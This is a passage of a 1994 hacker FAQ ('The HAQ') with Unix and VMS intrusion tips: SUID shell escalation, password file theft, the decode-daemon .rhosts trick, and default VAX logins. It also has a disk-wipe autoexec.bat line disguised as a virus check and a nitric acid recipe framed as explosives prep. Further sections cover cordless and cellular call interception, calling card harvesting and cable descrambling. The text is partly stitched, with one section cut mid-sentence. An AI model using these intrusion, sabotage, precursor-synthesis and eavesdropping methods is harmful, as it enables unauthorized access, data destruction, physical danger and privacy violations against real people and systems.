1. Someone has a SUID program on their account, it happens to allow
a shell to, like @ or jump to a shell. If it does that, after you
execute said file and then spawn a shell off of it, all you do
in that shell has the privs of that owner.
2. If there is no way to get a shell, BUT they leave the file
writable, just write over it a script that spawns a shell, and you
got their privs again.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I HACK INTO AN AIX MACHINE?
(from Prometheus)

If you can get access to the ‘console’ AIX machines have a security
hole where you can kill the X server and get a shell with
ctrl-alt-bkspce. Also by starting an xterm up from one you are not
logged in the utmp for that session because the xterms don’t do utmp
logging as a default in AIX. Or try the usual UNIX tricks:
ftping /etc/passwd, tftping /etc/passwd, doing a finger and then
trying each of the usernames with that username as a password.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I INCREASE MY DISK QUOTA ON UNIX?
(from Prometheus)

A UNIX disk quota may be increased by finding a directory on another
partition and using that. Find another user who wants more quota and
create a directory for the other to use, one that is world writable.
Once they’ve put their subdirectory in it, change the perms on the
directory to only read-execute. The reason this works is that
usually accounts are distributed across a couple of filesystems, and
admins are usually too lazy to give users the same quotas on each
filesystem. If the users are all on one filesystem, you may be able
to snag some space from one of the /usr/spool directories by creating
a ‘hidden’ subdirectory like .debug there, and using that.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I FOOL AROUND ON XTERM / XWINDOWS?
(from Wildgoose)
Most x commands have a -display option which allows you to pick a
terminal to send to. So if you use bitmap to create a bitmap, or
download one, etc then:

xsetroot -bitmap bitmapname
[display the bitmap on your screen]

xsetroot -bitmap bitmapname -display xt2500:0
[display the bitmap on another xterm]

Other uses, try xterm -display xt??:0 will give someone else one of
your login windows to play with. They are then logged in as you
though, and can erase your filespace, etc. Beware!

Slightly irritating:
xclock -geom 1200x1200 -display xt??:0
[fills the entire screen with a clock]

Slightly more irritating:
Use a shell script with xsetroot to flash people’s screens different
colors.

On the nastier side:
Use a shell script with xsetroot to kill a person’s window manager.

Downright nasty:
Consult the man pages on xkill. It is possible to kill windows on
any display. So to log someone off an xterm you merely have to xkill
their login window.

Protect yourself:
If you use xhost - this will disable other people from being able
to log you out or generally access your terminal.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I TAKE ADVANTAGE OF THE DECODE DAEMON?
(from Caustic)
First, you need to make sure that the decode daemon is active.
Check this by telnetting to the smtp port (usually port 25), and
expanding user Decode. If it gives you something, you can use it.
If it tells you that the user doesn’t exist, or whatever, you can’t.

If the daemon is active, this is how to exploit the decode daemon:
1) uuencode an echo to .rhosts
2) pipe that into mail, to be sent to the decode daemon
(What happens: the decode daemon (1st) decodes the process, but
leaves the bin privileges resident. (2nd) the echo command is
executed, because now the decoded message assumes the bin privileges
[which are *still* active, even though the daemon didn’t issue the
command]).
3) If this is done right, you will be able to rlogin to the system.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I GET THE PASSWORD FILE IF IT IS SHADOWED?
(from Belisarius)
If your system has Yellow Pages file management:

ypcat /etc/passwd > whatever.filename

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW IS A PASSWORD ENCRYPTED IN UNIX?
(from UNIX System Security[p.147])
Password encryption on UNIX is based on a modified version of
the DES [Data Encryption Standard]. Contrary to popular belief, the
typed password is not encrypted. Rather the password is used as the
key to encrypt a block of zero-valued bytes.
To begin the encryption, the first seven bits of each character
in the password are extracted to form the 56-bit key. This implies
that no more than eight characters are significant in a password.
Next, the E table is modified using the salt, which is the first two
characters of the encrypted password (stored in the passwd file).
The purpose of the salt is to make it difficult to use hardware DES
chips or a precomputed list of encrypted passwords to attack the
algorithm. The DES algorithm (with the modified E table) is then
invoked for 25 iterations on the block of zeros. The output of this
encryption, which is 64 bits long, is then coerced into a
64-character alphabet (A-Z, a-z, 0-9, “.” and “/”). Because this
coercion involves translations in which several different values are
represented by the same character, password encryption is essentially
one-way; the result cannot be decrypted.
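
Added example (not from the quoted book or the original FAQ): the key and salt handling described above, showing why only eight characters of seven bits each contribute to the key, which is the reason this scheme should be replaced by a modern password hash. It does not implement DES; the alphabet ordering and salt bit order follow the conventional crypt(3) layout, which is an assumption beyond the quoted text, and all names and sample values are constructed.

```python
# Conventional crypt(3) ordering of the 64-character alphabet (assumption).
CRYPT_ALPHABET = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def des_key_bits(password: bytes) -> int:
    """Return the 56-bit key: low seven bits of each of the first eight bytes."""
    key = 0
    for byte in password[:8].ljust(8, b"\0"):  # short passwords are zero-padded
        key = (key << 7) | (byte & 0x7F)       # the eighth bit is discarded
    return key


def split_hash(field: str):
    """Split a 13-character passwd hash field into (salt, digest)."""
    if len(field) != 13 or any(c not in CRYPT_ALPHABET for c in field):
        raise ValueError("not a traditional crypt field")
    return field[:2], field[2:]


def salt_value(salt: str) -> int:
    """12-bit number (0..4095) that selects the E-table modification."""
    if len(salt) != 2:
        raise ValueError("salt must be two characters")
    return CRYPT_ALPHABET.index(salt[0]) | (CRYPT_ALPHABET.index(salt[1]) << 6)


def policy_warnings(password: bytes) -> list:
    """Explain which parts of a candidate password the scheme would ignore."""
    warnings = []
    if len(password) > 8:
        warnings.append("%d trailing byte(s) ignored" % (len(password) - 8))
    if any(b & 0x80 for b in password[:8]):
        warnings.append("high bit of some bytes ignored")
    if len(password) < 8:
        warnings.append("key padded with %d zero byte(s)" % (8 - len(password)))
    return warnings


if __name__ == "__main__":
    # Constructed inputs: both pairs collapse to the same 56-bit key.
    for a, b in ((b"password1", b"password2"), (b"caf\xe9", b"cafi")):
        print(a, b, des_key_bits(a) == des_key_bits(b))
    salt, digest = split_hash("Ab3dEfGhIjKlM")  # constructed, not a real hash
    print(salt, salt_value(salt), len(CRYPT_ALPHABET) ** 2, "possible salts")
    print(policy_warnings(b"correct horse battery"))
```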

=====================================================================
VIII. Screwing with the most secure operating system on the net
(VAX/VMS Hacking)

WHAT IS VAX/VMS?

VAX: Virtual Address eXtension. Computer is designed to use memory
addresses beyond the actual hardware and can therefore run progs
larger than physical memory. Developed by Digital Equipment
Corporation (DEC).

VMS: Virtual Memory System. Also developed by DEC.

DCL: Digital Command Language. Similar to DOS batch language or
UNIX script language.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT ARE SOME OF THE DEFAULT VAX LOGINS?
Username        Password
--------        --------
DECNET          DECNET
DEFAULT         DEFAULT
DEMO            DEMO
                unpassworded
FIELD           FIELD
                SERVICE
GUEST           GUEST
                unpassworded
OPERATOR        OPERATOR
OPERATIONS      OPERATIONS
SYSMAINT        SYSMAINT
                SERVICE
                DIGITAL
SYSTEM          SYSTEM
                MANAGER
                OPERATOR
                SYSLIB
SYSTEST         UETP
                SYSTEST
SYSTEST_CLIG    CLIG
                SYSTEST
                TEST
SUPPORT         SUPPORT
                DEC

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT ARE SOME OF THE BASIC COMMANDS FROM THE “$” PROMPT?
@: executes a DCL program
usage- @filename.com
ACCOUNTING: program that tracks usage of the system by users
CREATE: PASCAL compiler
usage- CREATE filename.pas
CREATE/DIR: create a subdirectory
DEL: delete files
usage- DEL filename.ext
DIR: list the contents of a directory
options- /FULL = full listing with all security info
/BRIEF = brief listing
* = wildcard for anything
% = wildcard for a specific character
EDIT: VMS editor, requires VT-220 terminal
HELP: brings up help info
LOGOUT: obvious
MAIL: send E-mail locally and to any connected networks
$PASSWORD: change your password
usage- $PASSWORD newpassword
PHONE: chat program
usage- PHONE changes the prompt to a ‘%’, from there type in
the username you wish to talk to. If the user is on a
different node then enter nodename::username
PHOTO: record session
RUN: execute an executable file
SHOW: lets you look at a lot of different stuff
usage- SHOW option
options- CLUSTER = VAX cluster, if any
DEFAULT = directory path and device
DEVICES = system devices (drives, modems, etc.)
INTRUSION = accounts being hacked, if any
MEMORY = obvious
NETWORK = network name and VAX’s location in it
PROCESS = PROCESS processname shows status
QUOTA = disk space available for account
SYSTEM = system info
DAY = obvious
TIME = obvious
USERS = online users
TYPE: display file on terminal (same as DOS ‘type’ and UNIX ‘cat’)
SET FILE/PROTECTION: sets the Read/Write/Execute/Delete flags
usage- SET FILE/PROTECTION=OWNER[RWED] filename.ext
options- WORLD, GROUP, or SYSTEM can be used in place of OWNER
WORLD = all users in your world
GROUP = all users in your group
SYSTEM = all users with SYSPRV privileges
SET TERMINAL: controls terminal settings
usage- SET TERMINAL/option
options- WIDTH=80 = set width to 80 columns
ADVANCED_VIDEO = selects 124×24 lines
NOADVANCED_VIDEO = unselects 124×24 lines
ANSI_CRT = selects ANSI escape sequences
NOANSI_CRT = unselects ANSI escape sequences
AUTOBAUD = allows computer to select highest possible
baud rate
NOAUTOBAUD = turn off automatic baud selection
BROADCAST = allows receipt of SEND, MAIL and PHONE
messages
NOBROADCAST = prevents reception of SEND, MAIL and
PHONE messages
DEVICE_TYPE=VT220 = set terminal type to VT-220
ECHO = enables echoing from DCL command line
NOECHO = disable DCL command line echoing
FULLDUP = enable full duplex
NOFULLDUP = disable full duplex
HANGUP = log off if no carrier
NOHANGUP = don’t log off even if no carrier
INQUIRE = show device type of terminal
PAGE=43 = set display length to 43 lines
TYPE_AHEAD = enable type ahead function
NOTYPE_AHEAD = disable type ahead function
UNKNOWN = use for ASCII device types
WRAP = set wrap around feature
NOWRAP = unset wrap around feature

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT ARE COMMON VAX FILENAME EXTENSIONS?

COMPILER SOURCE CODE FILES
==========================
ADA = ADA compiler source code file
BAS = BASIC compiler source code file
B32 = BLISS-32 compiler source code file
C = C compiler source code file
COB = COBOL compiler source code file
FOR = FORTRAN compiler source code file
MAR = MACRO compiler source code file
PAS = PASCAL compiler source code file
PLI = PL/I compiler source code file
OBJ = object code created by compiler before linking

DCL LANGUAGE FILES
==================
CLD = DCL command description file
COM = DCL batch file

GENERAL FILES
=============
DAT = DATa file
DIR = subDIRectory file
EXE = EXEcutable program
HLP = text for HeLP libraries
LIS = system listing files (TYPE, PRINT, PHOTO)
LOG = batch job output
MEM = DSR output file
RNO = DSR source file
SIXEL = file for SIXEL graphics
SYS = SYStem image file
TJL = Trouble JournaL
TMP = TeMPorary file
TXT = text library input file
UAF = User Authorization File

MAIL FILES
==========
DIS = DIStribution file
MAI = MAIl message file
TXT = mail output file

EDT EDITOR FILES
================
EDT = command file for the EDT editor
JOU = EDT journal when problems occur
TPU = editor command file

=====================================================================
IX. Screwing with the most widespread operating system on PCs
(MS-DOS Hacks)

HOW TO REALLY **ERASE** A HARDDRIVE
(from Amarand)
Install a small program (in the Dos directory would be good) called
Wipe, by Norton Utilities. I am pretty sure that executing this
program, using the proper command line options, you can go one
better than formatting the hard drive. Wiping the information
changes each bit in the object (file, FAT, disk, hard drive) to a
zero…or a random bit, or an alternating bit instead of just
deleting the reference to it in the file allocation table. If you
just delete a file, or format a hard drive…with the new Dos you
would only need to let it run its course and then Unformat the drive.
Wipe, I have found, works much more effectively by first erasing the
file allocation table AFTER erasing the information the file
allocation table is used to find.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WRITING A .bat FILE TO ‘WIPE’ A DRIVE.
Add the following code to the end of autoexec.bat:
echo Please wait
echo Checking HardDisk for virii, this make take a while …
wipe > nothing.txt

This prevents any output from Wipe being output.

=====================================================================
X. Finding out what that encrypted info is
(Cracking programs)

WHAT ARE PASSWORD CRACKING PROGRAMS?
(from Belisarius)
There are three main cracking programs. They are Crack, Cracker Jack
and Cops. The latest versions are 4.1 for Crack and 1.4 for Cracker
Jack. Crack and COPS run on UNIX and CJack runs on a PC. CJack1.3
runs on any x86 class and CJack1.4 needs at least a 386. To use any
of these requires access to an unshadowed password file.
They are not programs that try to login to an account. They take the
password file (/etc/passwd in UNIX is usually the name) and guess the
passwords.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I GET THESE PROGRAMS?

Crack: ftp.virginia.edu /pub/security
CrackerJack: bnlux1.bnl.gov /pub/pezz
COPS:

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS WPCRACK?
WPCRAK is a cracker to break the encryption on WordPerfect files.
It works, but takes a long time to run.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS PKCRACK?
PKCRACK is a dictionary cracker for PKZIP. It works. It’s
dictionary, but it works. Not all that well, as you may have to sift
through multiple possible passwords, but it's better than nothing.

=====================================================================
XI. How do I keep my info secure
(PGP / Cryptology)

WHAT IS PGP?
(from Belisarius)
PGP stands for Pretty Good Protection, from a company called Pretty
Good Software. It is a public key encryption program for MS-DOS,
Unix, and Mac. You create a key pair. One private (secret) key
and a public key. The keys are different parts of the whole. I
distribute my public key and anyone who wants can grab it and add it to
their PGP keyring. Then when they want to send me a message they
encrypt it with PGP and my public key and then send it. Only I can
decrypt it because you need my secret key to decode it. (Trust me
you won’t get my secret key) That is PGP. Please use it if you
want to communicate anything of a ahhhh….sensitive manner.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I GET PGP?
(from an archie search)

FTP sites for PGP=Pretty Good Privacy Public Encryption System
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

========
Unix PGP
========

Host 130.149.17.7
Location: /pub/local/ini/security
FILE -rw-rw-r-- 651826 Apr 5 1993 pgp22.tar.Z

Host arthur.cs.purdue.edu
Location: /pub/pcert/tools/unix/pgp
FILE -r--r--r-- 651826 Mar 7 1993 pgp22.tar.Z

Host coombs.anu.edu.au
Location: /pub/security/cypher
FILE -r--r--r-- 651826 Nov 4 22:28 pgp22.tar.Z

==========
MS-DOS PGP
==========

Host zero.cypher.com
Location: /pub/pgp
FILE pgp23a.zip

================
MS-DOS PGP SHELL
================

Host athene.uni-paderborn.de
Location: /pcsoft/msdos/security
FILE -rw-r--r-- 65160 Aug 9 20:00 pgpshe22.zip

Host nic.switch.ch
Location: /mirror/msdos/security
FILE -rw-rw-r-- 65160 Aug 9 22:00 pgpshe22.zip

Host plains.nodak.edu
Location: /pub/aca/msdos/pgp
FILE -rw-r--r-- 65430 Nov 26 18:28 pgpshe22.zip

=======
Mac PGP
=======

Host plaza.aarnet.edu.au
Location: /micros/mac/info-mac/util
FILE -r--r--r-- 323574 Apr 26 1993 pgp.hqx

Host sics.se
Location: /pub/info-mac/util
FILE -rw-rw-r-- 323574 Nov 5 11:20 pgp.hqx

Host sumex-aim.stanford.edu
Location: /info-mac/util
FILE -rw-r--r-- 323574 Apr 26 1993 pgp.hqx

=====================================================================
XII. Chemistry 101
(explosive/pyrotechnic component prep)

HOW TO MAKE NITRIC ACID:
(from Neurophire)

Nitric acid is not TOO expensive, but is hard to find except from
chemical supply houses. Purchases can be traced.(From TBBOM13.TXT)

There are several ways to make this most essential of all acids for
explosives. One method by which it could be made will be presented.
again, be reminded that these methods SHOULD NOT BE CARRIED OUT!!

Materials: Equipment:
———- ———-
sodium nitrate or adjustable heat source
potassium nitrate
retort
distilled water
ice bath
concentrated
sulfuric acid stirring rod

collecting flask with
stopper

1) Pour 32 milliliters of concentrated sulfuric acid into the retort.

2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of
potassium nitrate. and add this to the acid slowly. If it all does
not dissolve, carefully stir the solution with a glass rod until
it does.

3) Place the open end of the retort into the collecting flask, and
place the collecting flask in the ice bath.

4) Begin heating the retort, using low heat. Continue heating until
liquid begins to come out of the end of the retort. The liquid that
forms is nitric acid. Heat until the precipitate in the bottom of
the retort is almost dry, or until no more nitric acid is forming.
CAUTION: If the acid is heated too strongly, the nitric acid will
decompose as soon as it is formed. This can result in the
production of highly flammable and toxic gasses that may explode.
It is a good idea to set the above apparatus up, and then get away
from it.

Potassium nitrate could also be obtained from store-bought black
powder, simply by dissolving black powder in boiling water and
filtering out the sulfur and charcoal. To obtain 68 g of potassium
nitrate, it would be necessary to dissolve about 90 g of black powder
in about one liter of boiling water. Filter the dissolved solution
through filter paper in a funnel into a jar until the liquid that
pours through is clear. The charcoal and sulfur in black powder are
insoluble in water, and so when the solution of water is allowed to
evaporate, potassium nitrate will be left in the jar.

=====================================================================
XIII. Fun things with solder, wires, and parts
(Underground electronics)

HOW TO MAKE HIGH FREQUENCY TONES TO ANNOY SOMEONE?
(from Angel of Death with Belisarius)

The idea is to make a simple timing circuit to create a high freq
tone. The timing circuit is based upon the 555-chip and uses a
simple speaker to convert the pulses from the 555 into sound.

Required materials: 555 timer chip, 9 V battery, .01 uF capacitor,
100k potentiometer, tweeter speaker, wire
(the capacitor and resistor values can vary
although that changes the possible freqs)

-9V (GND)
[\ |
[s\ | ________ ________
[p \ | | \/ |
[e +——-+——————-+–| 1 8 |– +9V
[a | | | |
[k | | | /.01uF CAP | 5 |
[e +-+ +–|(——+———–| 2 5 7 |
[r / | | \ | | 5 |
[ / | | | |
[/ +————— | ———-| 3 t 6 |—-+
| | | i | |
| | | m | |
| | +9V –| 4 e 5 | |
| | | r | |
| | |__________________| |
| | |
| /\ | |
+—-\ / \—–+———————————–+
\/ 100k POT

555 Timer Pin Connections
-------------------------
Pin 1: Ground (-9V side of bat), one lead of tweeter, one lead
of capacitor
Pin 2: Pin 6 and other lead of capacitor
Pin 3: Other lead of the tweeter, one lead of the resistor
Pin 4: Pin 8 and the +9V
Pin 5: No connections
Pin 6: Pin 2 and the other lead of the potentiometer
Pin 7: No connections
Pin 8: Pin 4 and the +9V

=====================================================================
XIV. Watching television
(cable, Pay-Per-View(PPV), scrambling)

HOW IS CABLE TV SCRAMBLED?
(from Aero)

There are three main types of scrambling for cable TV: trap filters,
general scrambling and addressable scrambling.

1. Trap filters. Located in the distribution box and physically
prevent the desired channel from reaching your house. All you see
when this technique is used is theoretically static (i.e. a blank
channel). No filter is perfect, so some signal may reach your TV.
This is an older system of cable protection, and it is easy to bypass
(go out to the box and remove the filter).

2. General scrambling. This system scrambles the pay channels (all
the channels before they reach the box), and you need a special
decoder to unscramble them. The most common method of scrambling is
to remove the sync signal. This is also easy to get around as you
can buy descramblers.

3. Addressable descramblers. The cable box receives the scrambled
channels, but the cable company sends signals to the box telling it
which ones should be unscrambled. This is the system used by most
pay-per-view systems. This is a little harder to defeat, but not too
bad if you have the right equipment/friends.

-=-=-=-=-=-=-=-=-=-=-=-=-=- END of THE HAQ2.07/2 -=-=-=-=-=-=-=-=-=-=-=-

**

Jun 13, 1994 19:54 from Belisarius

_____________
/ / / *** *** ****** ******
/ *** *** ********* *********
/ / *** *** *** *** *** ***
/ / *********** *********** *** ***
/ /_____ ______ *********** *********** *** ** ***
/ / / /_____/ *** *** *** *** *** *****
/ / / / *** *** *** *** ***********
/ / / /______ *** *** *** *** ***** ***

+---------------+
| THE HAQ |
| Edition 2.07 |
| 11 JUN 1994 |
+---------------+

File 3 of 3

=====================================================================
XV. Tuning in to what’s on the radio waves
(Radios and Scanning)

WHAT DO I NEED TO START SCANNING?
There are two main scanner types (determined by the method of
radio reception): either crystal or programmable(synthetic) tuning.
Crystal tuning requires a specific crystal for each desired freq, at

====== ===============
1 46.610
2 46.630
3 46.670
4 46.710
5 46.730
6 46.770
7 46.830
8 46.870
9 46.930
10 46.970

The range on cordless phones is usually only a block or two. To
monitor someones calls use a small portable scanner and cassette
recorder and you will have a tape of all their calls.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I SCAN CELLULAR PHONE CONVERSATIONS?
Cellular telephones are a great source of info as they are used by
doctors, lawyers, and other big business. They are also a great
source of calling card numbers.

Cellular phones operate on a very simple premise. They receive on
one frequency and transmit on another freq in order to allow
simultaneous communication. The area is split into two bands
(Band A and Band B) which are split into 21 cells (hence the name
cellular) and each cell has 16 channels within it.

Cellular arrangement:

______ ______
/ \ / \
/ \ / \
/ Cell \______/ Cell \______
\ #1 / \ #5 / \
\ / \ / \
\______/ Cell \______/ Cell \
/ \ #3 / \ #7 /
/ \ / \ /
/ Cell \______/ Cell \______/
\ #2 / \ #6 / \
\ / \ / \
\______/ Cell \______/ Cell \
/ \ #4 / \ #8 /

Band A uses channels 1-333 and Band B uses channels 334-666. Usually
the first channel in each cell is the Data Channel (333 for Cell 1A,
331 for Cell 2A, etc.). There are simple formulas to calculate the
frequency for receive and transmit for each channel.

Transmit freq = (channel number * .030 MHz) + 870 MHz

Receive freq = (channel number * .030 MHz) + 825 MHz

So for Channel 333: T=879.990 MHz and R=834.990 MHz

FOR BAND A
==========
Cell #
Chan 1 2 3 4 5 6 7

1 333 332 331 330 329 328 327
879.990 879.960 879.930 879.900 879.870 879.840 879.810
834.990 834.960 834.930 834.900 834.870 834.840 834.810

2 312 311 310 309 308 307 306
879.360 879.330 879.300 879.270 879.240 879.210 879.180
834.360 834.330 834.300 834.270 834.240 834.210 834.180

3 291 290 289 288 287 286 285
878.730 878.700 878.670 878.640 878.610 878.580 878.550
833.730 833.700 833.670 833.640 833.610 833.580 833.550

4 270 269 268 267 266 265 264
878.100 878.070 878.040 878.010 877.980 877.950 877.920
833.100 833.070 833.040 833.010 832.980 832.950 832.920

5 249 248 247 246 245 244 243
877.470 877.440 877.410 877.380 877.350 877.320 877.290
832.470 832.440 832.410 832.380 832.350 832.320 832.290

6 228 227 226 225 224 223 222
876.840 876.810 876.780 876.750 876.720 876.690 876.660
831.840 831.810 831.780 831.750 831.720 831.690 831.660

7 207 206 205 204 203 202 201
876.210 876.180 876.150 876.120 876.090 876.060 876.030
831.210 831.180 831.150 831.120 831.090 831.060 831.030

8 186 185 184 183 182 181 180
875.580 875.550 875.520 875.490 875.460 875.430 875.400
830.580 830.550 830.520 830.490 830.460 830.430 830.400

9 165 164 163 162 161 160 159
874.950 874.920 874.890 874.860 874.830 874.800 874.770
829.950 829.920 829.890 829.860 829.830 829.800 829.770

10 144 143 142 141 140 139 138
874.320 874.290 874.260 874.230 874.200 874.170 874.140
829.320 829.290 829.260 829.230 829.200 829.170 829.140

11 123 122 121 120 119 118 117
873.690 873.660 873.630 873.600 873.570 873.540 873.510
828.690 828.660 828.630 828.600 828.570 828.540 828.510

12 102 101 100 99 98 97 96
873.060 873.030 873.000 872.970 872.940 872.910 872.880
828.060 828.030 828.000 827.970 827.940 827.910 827.880

13 81 80 79 78 77 76 75
872.430 872.400 872.370 872.340 872.310 872.280 872.250
827.430 827.400 827.370 827.340 827.310 827.280 827.250

14 60 59 58 57 56 55 54
871.800 871.770 871.740 871.710 871.680 871.650 871.620
826.800 826.770 826.740 826.710 826.680 826.650 826.620

15 39 38 37 36 35 34 33
871.170 871.140 871.110 871.080 871.050 871.020 870.990
826.170 826.140 826.110 826.080 826.050 826.020 825.990

16 18 17 16 15 14 13 12
870.540 870.510 870.480 870.450 870.420 870.390 870.360
825.540 825.510 825.480 825.450 825.420 825.390 825.360

Cell #
Chan 8 9 10 11 12 13 14

1 326 325 324 323 322 321 320
879.780 879.750 879.720 879.690 879.660 879.630 879.600
834.780 834.750 834.720 834.690 834.660 834.630 834.600

2 305 304 303 302 301 300 299
879.150 879.120 879.090 879.060 879.030 879.000 878.970
834.150 834.120 834.090 834.060 834.030 834.000 833.970

3 284 283 282 281 280 279 278
878.520 878.490 878.460 878.430 878.400 878.370 878.340
833.520 833.490 833.460 833.430 833.400 833.370 833.340

4 263 262 261 260 259 258 257
877.890 877.860 877.830 877.800 877.770 877.740 877.710
832.890 832.860 832.830 832.800 832.770 832.740 832.710

5 242 241 240 239 238 237 236
877.260 877.230 877.200 877.170 877.140 877.110 877.080
832.260 832.230 832.200 832.170 832.140 832.110 832.080

6 221 220 219 218 217 216 215
876.630 876.600 876.570 876.540 876.510 876.480 876.450
831.630 831.600 831.570 831.540 831.510 831.480 831.450

7 200 199 198 197 196 195 194
876.000 875.970 875.940 875.910 875.880 875.850 875.820
831.000 830.970 830.940 830.910 830.880 830.850 830.820

8 179 178 177 176 175 174 173
875.370 875.340 875.310 875.280 875.250 875.220 875.190
830.370 830.340 830.310 830.280 830.250 830.220 830.190

9 158 157 156 155 154 153 152
874.740 874.710 874.680 874.650 874.620 874.590 874.560
829.740 829.710 829.680 829.650 829.620 829.590 829.560

10 137 136 135 134 133 132 131
874.110 874.080 874.050 874.020 873.990 873.960 873.930
829.110 829.080 829.050 829.020 828.990 828.960 828.930

11 116 115 114 113 112 111 110
873.480 873.450 873.420 873.390 873.360 873.330 873.300
828.480 828.450 828.420 828.390 828.360 828.330 828.300

12 95 94 93 92 91 90 89
872.850 872.820 872.790 872.760 872.730 872.700 872.670
827.850 827.820 827.790 827.760 827.730 827.700 827.670

13 74 73 72 71 70 69 68
872.220 872.190 872.160 872.130 872.100 872.070 872.040
827.220 827.190 827.160 827.130 827.100 827.070 827.040

14 53 52 51 50 49 48 47
871.590 871.560 871.530 871.500 871.470 871.440 871.410
826.590 826.560 826.530 826.500 826.470 826.440 826.410

15 32 31 30 29 28 27 26
870.960 870.930 870.900 870.870 870.840 870.810 870.780
825.960 825.930 825.900 825.870 825.840 825.810 825.780

16 11 10 9 8 7 6 5
870.330 870.300 870.270 870.240 870.210 870.180 870.150
825.330 825.300 825.270 825.240 825.210 825.180 825.150

Cell #
Chan 15 16 17 18 19 20 21

1 319 318 317 316 315 314 313
879.570 879.540 879.510 879.480 879.450 879.420 879.390
834.570 834.540 834.510 834.480 834.450 834.420 834.390

2 298 297 296 295 294 293 292
878.940 878.910 878.880 878.850 878.820 878.790 878.760
833.940 833.910 833.880 833.850 833.820 833.790 833.760

3 277 276 275 274 273 272 271
878.310 878.280 878.250 878.220 878.190 878.160 878.130
833.310 833.280 833.250 833.220 833.190 833.160 833.130

4 256 255 254 253 252 251 250
877.680 877.650 877.620 877.590 877.560 877.530 877.500
832.680 832.650 832.620 832.590 832.560 832.530 832.500

5 235 234 233 232 231 230 229
877.050 877.020 876.990 876.960 876.930 876.900 876.870
832.050 832.020 831.990 831.960 831.930 831.900 831.870

6 214 213 212 211 210 209 208
876.420 876.390 876.360 876.330 876.300 876.270 876.240
831.420 831.390 831.360 831.330 831.300 831.270 831.240

7 193 192 191 190 189 188 187
875.790 875.760 875.730 875.700 875.670 875.640 875.610
830.790 830.760 830.730 830.700 830.670 830.640 830.610

8 172 171 170 169 168 167 166
875.160 875.130 875.100 875.070 875.040 875.010 874.980
830.160 830.130 830.100 830.070 830.040 830.010 829.980

9 151 150 149 148 147 146 145
874.530 874.500 874.470 874.440 874.410 874.380 874.350
829.530 829.500 829.470 829.440 829.410 829.380 829.350

10 130 129 128 127 126 125 124
873.900 873.870 873.840 873.810 873.780 873.750 873.720
828.900 828.870 828.840 828.810 828.780 828.750 828.720

11 109 108 107 106 105 104 103
873.270 873.240 873.210 873.180 873.150 873.120 873.090
828.270 828.240 828.210 828.180 828.150 828.120 828.090

12 88 87 86 85 84 83 82
872.640 872.610 872.580 872.550 872.520 872.490 872.460
827.640 827.610 827.580 827.550 827.520 827.490 827.460

13 67 66 65 64 63 62 61
872.010 871.980 871.950 871.920 871.890 871.860 871.830
827.010 826.980 826.950 826.920 826.890 826.860 826.830

14 46 45 44 43 42 41 40
871.380 871.350 871.320 871.290 871.260 871.230 871.200
826.380 826.350 826.320 826.290 826.260 826.230 826.200

15 25 24 23 22 21 20 19
870.750 870.720 870.690 870.660 870.630 870.600 870.570
825.750 825.720 825.690 825.660 825.630 825.600 825.570

16 4 3 2 1
870.120 870.090 870.060 870.030
825.120 825.090 825.060 825.030

FOR BAND B
==========

Cell #
Chan 1 2 3 4 5 6 7

1 334 335 336 337 338 339 340
880.020 880.050 880.080 880.110 880.140 880.170 880.200
835.020 835.050 835.080 835.110 835.140 835.170 835.200

2 355 356 357 358 359 360 361
880.650 880.680 880.710 880.740 880.770 880.800 880.830
835.650 835.680 835.710 835.740 835.770 835.800 835.830

3 376 377 378 379 380 381 382
881.280 881.310 881.340 881.370 881.400 881.430 881.460
836.280 836.310 836.340 836.370 836.400 836.430 836.460

4 397 398 399 400 401 402 403
881.910 881.940 881.970 882.000 882.030 882.060 882.090
836.910 836.940 836.970 837.000 837.030 837.060 837.090

5 418 419 420 421 422 423 424
882.540 882.570 882.600 882.630 882.660 882.690 882.720
837.540 837.570 837.600 837.630 837.660 837.690 837.720

6 439 440 441 442 443 444 445
883.170 883.200 883.230 883.260 883.290 883.320 883.350
838.170 838.200 838.230 838.260 838.290 838.320 838.350

7 460 461 462 463 464 465 466
883.800 883.830 883.860 883.890 883.920 883.950 883.980
838.800 838.830 838.860 838.890 838.920 838.950 838.980

8 481 482 483 484 485 486 487
884.430 884.460 884.490 884.520 884.550 884.580 884.610
